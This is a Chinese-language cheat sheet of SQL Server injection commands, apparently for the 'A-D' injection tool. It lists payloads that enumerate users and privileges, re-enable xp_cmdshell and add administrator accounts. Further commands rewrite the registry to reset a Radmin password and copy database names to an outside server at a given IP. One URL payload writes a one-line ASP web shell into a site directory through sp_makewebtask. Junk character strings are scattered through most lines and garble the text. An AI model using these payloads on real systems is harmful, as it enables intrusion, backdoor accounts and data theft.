阿D常用的一些注入命令
/ k5 y" e. q6 o/ n9 X//看看是什么权限的
" J1 L( g3 m3 s. O9 h& `. [6 }; [and 1=(Select IS_MEMBER('db_owner'))4 ~5 w* S( W! b; T+ `; N' [ M
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--9 g; c7 r7 l# H1 x# X: R
5 P, C9 U0 l! b8 m' p
//检测是否有读取某数据库的权限8 R3 p* `# z' U
and 1= (Select HAS_DBACCESS('master'))2 k% q i1 b7 m3 A; q' j' q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
- R4 G- e% k- `2 v& r, t1 Q. j2 C. t; ~2 w$ e% W4 Y
]4 r" `8 `- x3 A; s5 m
数字类型
% X1 K% s/ o# w i: z2 Dand char(124)%2Buser%2Bchar(124)=0
! v& ^% R( J4 {5 o T9 |1 p: G6 C1 e0 W1 l1 ?. l0 I
字符类型
2 N8 k9 {- O' N( d' and char(124)%2Buser%2Bchar(124)=0 and ''='/ _8 m8 Y9 O7 w0 H4 P4 U' m
+ s- E5 b( G% T2 W
搜索类型$ D; {9 W) Y; u% ~) B2 a
' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ N w" [! r% k9 j
( ^) u) @4 s; `5 j! N! W爆用户名
9 n( l. E1 h; Hand user>0/ l- I- G9 Y }8 V
' and user>0 and ''='
3 y/ @0 U7 J# N R
D+ A3 V% @1 y- y, o& t9 x检测是否为SA权限; M2 G8 k& q$ h. G# s! a
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* T! ?2 t O; h6 v7 _And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --% n; m- p& p4 ?- l5 R% U# g: [
/ f' t! \) Z l检测是不是MSSQL数据库! M6 I1 j" S) |0 c* j$ c: y
and exists (select * from sysobjects);--
# V o. e$ G1 m- `& o7 v4 A/ z: }
) \1 |7 Z! t4 O0 R) Z检测是否支持多行
, e6 A5 {" e1 Z0 |;declare @d int;-- ' _) l: C9 \1 {( C. l$ b6 g
; H2 X# C! }& ^ j9 N恢复 xp_cmdshell
+ T) ]# _$ M) X! p. N- F8 _0 W" z0 ];exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--* v' W* m: k6 n" N1 R
' e% _2 @9 s( R
$ p$ @, Z5 T5 X: B. d* \+ zselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') * h/ o9 q4 L+ b* H
. V& a. D/ _/ M* t: M/ ^//-----------------------
, q# M5 h: n/ J" k! l4 {- ~7 q9 c8 E// 执行命令
# ]5 S8 q0 `5 `1 T8 o( R//-----------------------
6 y0 t2 N& u+ }. S- j2 ? A+ @首先开启沙盘模式:
& y. W8 ^4 o- m, A' W' G, texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; i G& d, Z$ w6 E. z9 f, X$ P! B
7 C9 b; u3 `1 B! B
然后利用jet.oledb执行系统命令
5 p/ T* Z; m* F/ k' _4 Y1 }select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), t2 V7 t( Z8 M
, B; h# Y3 c; E# Q执行命令
( `" O# Y; g* g5 T0 d" U9 @& C;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--$ o) X8 }1 s/ I2 M6 E/ U
( _- M% o& M' M1 P( Q8 ?: X
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
* [) {$ a+ R" Q) d4 p
! [9 Y0 V- y& ~! @0 C W判断xp_cmdshell扩展存储过程是否存在:
, |9 G9 R8 D5 @: mhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 J, E! Q# Q: x" {
8 E( t$ q; H0 e& A4 P
写注册表
( }$ Z$ v% ~* ^ aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; y2 B6 i' M9 e$ Z% B
( W; @; d P! v' e* YREG_SZ
, `) W5 ]7 Z8 \# [+ U
; s3 L ?1 d3 J7 P' l读注册表+ n! A3 B ~% ?: K1 D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
% C0 ~+ P; y! o! q2 f" e% S7 g# g/ L$ U: ]- W* c2 A
读取目录内容
8 a' b/ `. m( M# s) O( iexec master..xp_dirtree 'c:\winnt\system32\',1,1
+ j( G- V) Q, @
& i. d7 O! t* o- |% E& S& F% C! o* i6 h
数据库备份- K% r% ?1 j2 H1 C, o9 t) k+ r8 k
backup database pubs to disk = 'c:\123.bak'
p% b) S" P( M B6 y. w
8 V. q' _# P! N//爆出长度' v' S9 ^# @3 J. i0 j& t
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
( O4 x5 C: h* O8 I# d7 g, H2 Z: g3 g7 Q. C
% a, L$ N" ?1 L# J: e
+ ^6 b% l6 N. G' L& l0 c更改sa口令方法:用sql综合利用工具连接后,执行命令:) v5 G! b* S+ t* D1 ] v
exec sp_password NULL,'新密码','sa'2 d7 u0 o& p2 t. }6 \+ i" E
& Q6 ~, s0 }$ E* \& U; I$ t
添加和删除一个SA权限的用户test:3 {6 x4 v5 O* ]0 L2 V
exec master.dbo.sp_addlogin test,ptlove8 y" H- U' W" H% f, a9 k: {6 [
exec master.dbo.sp_addsrvrolemember test,sysadmin
; w1 ~: j4 B3 Y# j5 L
& e2 |" ~- t, W0 d8 m Z/ L删除扩展存储过过程xp_cmdshell的语句: # ]3 @$ D' ^+ H+ z6 l/ l
exec sp_dropextendedproc 'xp_cmdshell'
; B- M" d+ J5 q1 t4 Q7 ^& L }
4 O+ V) }7 v. o; f添加扩展存储过过程
, ^: P3 }0 R5 g, m0 `$ KEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. C- j* N9 I2 P( s3 o2 m0 i! B3 SGRANT exec On xp_proxiedadata TO public
- N) Q3 l: w( d4 L- i
4 [8 _6 B) e2 S. b7 L9 U* R
5 A* R1 p. r6 H% N$ o4 a2 f" ~停掉或激活某个服务。
& g8 x3 Y' o1 D* A
" k! R8 T \, ^8 e, n V& Mexec master..xp_servicecontrol 'stop','schedule': R5 c, {0 U9 W, v: E7 g
exec master..xp_servicecontrol 'start','schedule'
# c. _, R- u$ W* J0 B: V0 V7 e4 [. J( d+ q* x
dbo.xp_subdirs+ `2 k( } f. V, s$ W6 Q
" w- X; }0 l; Z; ~只列某个目录下的子目录。; a4 V( y5 V* z& u- F' _
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' U% ]. _8 ~2 H0 D
% r4 J6 U3 I5 f! W. k
dbo.xp_makecab
% l0 M3 t8 u4 |( E7 M2 H
2 v) @6 P3 A8 V! d8 J" E' Q% M0 I将目标多个档案压缩到某个目标档案之内。
0 y' w& F3 P% Y1 w; c; n* p所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。3 {. J; Z3 {6 D% N; j: b7 ?3 Q
- J' e1 g& h% m- f# c( adbo.xp_makecab! T0 s$ f, j1 H2 P7 K. {
'c:\test.cab','mszip',1,
$ Z7 S! G; {; s. Q5 A( ]5 M B+ G5 S& R'C:\Inetpub\wwwroot\SQLInject\login.asp',
, f; P, {& h2 ?3 Z; c/ R6 d'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
, b. v1 `( j1 v: s2 L
; B3 T2 Z$ U0 Jxp_terminate_process# U" \$ R" T' Z4 ]5 x# `
5 i4 x" x P* M
停掉某个执行中的程序,但赋予的参数是 Process ID。
; O) B+ E3 E$ ~- c$ C4 H利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID' q% i4 E2 r$ Q' k7 V( W* t; j$ L
, ]; _1 l3 L1 c* Q5 Xxp_terminate_process 2484
8 d1 C- {" ]# T
' s+ X. @5 {1 w& t( {, Z* zxp_unpackcab
( a" s1 C4 P6 |# t7 ?0 b- o4 G
- p- S6 w3 N( z0 |解开压缩档。- \& N" H5 ]: c4 u
8 W1 Z. {& `+ M) yxp_unpackcab 'c:\test.cab','c:\temp',1
0 ?. H# l* X) f
: F" ?: W7 {2 L: G% Y" Q0 `% X6 T+ @0 y7 X/ @! d* {9 g
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234+ y! Q! j* r! z9 T! r6 `' P/ I3 v
/ s7 l, K9 h/ U. {+ P, e/ h3 B4 i
create database lcx;
, [& A8 ?6 b `; FCreate TABLE ku(name nvarchar(256) null);
$ d9 B1 u( s4 s" ECreate TABLE biao(id int NULL,name nvarchar(256) null);
3 I( M! \; M+ w" K; _" S- [/ @( q) h9 ]( r
//得到数据库名# u6 ~2 ^6 B% k# G* e3 q; `5 i
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases# `: U8 k, ?' y6 V
2 i# }2 x# z9 t7 j2 J( c
0 d5 d B) |3 y% \//在Master中创建表,看看权限怎样9 [9 X$ \ K, R
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
7 U7 l- z F( D1 j ~0 L* ?; D; S1 S- |: R- I/ n: x
用 sp_makewebtask直接在web目录里写入一句话马:
! f( [; N0 g, }; D, ^http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--# ~3 P3 R" z3 h; c1 Y
3 `% f% w9 d# N i5 p. m
//更新表内容3 ?; E q5 f p/ Q
Update films SET kind = 'Dramatic' Where id = 123
* V3 J( e$ {. O1 `2 H6 G
! a& N: s9 i/ W6 y! U//删除内容
i% z# G2 u$ e4 Idelete from table_name where Stockid = 3 |